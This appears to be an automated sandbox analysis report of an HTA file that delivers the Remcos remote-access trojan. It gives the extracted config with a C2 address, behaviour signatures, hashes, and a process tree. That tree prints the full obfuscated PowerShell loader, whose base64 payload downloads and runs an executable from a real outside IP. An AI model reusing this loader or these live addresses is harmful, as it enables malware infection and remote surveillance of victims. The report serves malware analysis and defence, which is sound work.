Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/12/2024, 16:22

General

  • Target

    crreatedbestthingswithgreatattitudeneedforthat.hta

  • Size

    142KB

  • MD5

    22ca9f87ffb6d9d3dc9d7e4f151470c7

  • SHA1

    df9bcef5ab55d8a5342bb7747d7936f4fe20afe7

  • SHA256

    6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470

  • SHA512

    e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2

  • SSDEEP

    768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\crreatedbestthingswithgreatattitudeneedforthat.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'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'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2076
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51AA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC51A9.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2080
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3028

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES51AA.tmp

    Filesize

    1KB

    MD5

    231bd52dc7439bba251272cae3e4d318

    SHA1

    641a9acb586866345f751d5c904d5e2aac153de1

    SHA256

    4a9ea347c34633b51985bc581815a85e2b031a7dc5a5c50d452faaa5f9440160

    SHA512

    82fc959401195037c4a72cb1ad2c6602b08b101d70b6890db8cad16f526bcc7e7c6b31b2b78535e35ee4345ab31bcf377a561436ed1183a3f86ffbcf41d223e9

  • C:\Users\Admin\AppData\Local\Temp\nwonvsm-.dll

    Filesize

    3KB

    MD5

    5f23f7054f66283c49b88b714229dc93

    SHA1

    226d34bec9d07d9ab433f120c4ab4e97d616cd77

    SHA256

    a560600f8d8f127957ea89bcfa198eb6c6d9236a763f68bb39269823c399a131

    SHA512

    ca73e9b90e6cb2c70d9c1ee8728248f38906c0bc0eb1c1221f2574cb50ffb2558e75a8e2ea3d38659fb74c29fd644523c04c677be22ed5867cb2e86ed31d160f

  • C:\Users\Admin\AppData\Local\Temp\nwonvsm-.pdb

    Filesize

    7KB

    MD5

    965f859617328356306a3bf742547ffb

    SHA1

    94b997dfed717a10e74ee891c0e38b6852e818e9

    SHA256

    58db4bfbe05f7acd1960c1c13689078372b9af50fde24c3568b3a075df139c42

    SHA512

    d0ebdd2e00910a4aaea31f576266a7059947cc768eb57b3b780d0e8bba2e91d1c6f12fbb6f642cb1e6db452b049e1adab18f03163c6ac5f35b2e8bf0d324c4ec

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC51A9.tmp

    Filesize

    652B

    MD5

    3fdcc3672039aa7b981410f10cfb6cf2

    SHA1

    c13d238dc1ffcb42647a27aada00ee073a10f166

    SHA256

    d1aff747b863248fe591ad8a6c812e215622c3192312e8c248fd37e1f0f99520

    SHA512

    7aa58b027843b4f28852a2c8c8f38a14d854c5cb82e0b290b638e48b3538aa6118644c59c597ea4d29f8ac0ec54619c30d2047f305eeab7a41c9017c32185dc0

  • \??\c:\Users\Admin\AppData\Local\Temp\nwonvsm-.0.cs

    Filesize

    478B

    MD5

    80c03b4485808d996cc8226157f377a7

    SHA1

    7cc7e02b84232b1523c555a349c86fc059a98eff

    SHA256

    240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

    SHA512

    ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

  • \??\c:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline

    Filesize

    309B

    MD5

    2eb5f5af0f3121c90a4d13fcf04181a6

    SHA1

    a1bf83f3026d48261c366a1ed906c77e076ab7cd

    SHA256

    bcd172a6ba8c3bb4662fd968f97a9b40062abb79e27c8a0a5763bd7c1e2f2c3c

    SHA512

    80433c3651c0314ce9fe92954cb540764ade1ad1e595595150578e9e3b511e239907744ef503421bcc18d0c4afa4ad3a650249f55731ed7bc23195743dbecd41

  • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    528KB

    MD5

    a2d03c5333bfecca62720cd6ee3a4dc4

    SHA1

    ce4c380f2748f375904c17b38d4f93e294fef4f6

    SHA256

    ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e

    SHA512

    5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c

  • memory/3028-35-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-39-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-34-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-32-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-36-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-37-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-38-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-33-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-40-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-41-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-42-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-43-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-44-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/3028-45-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB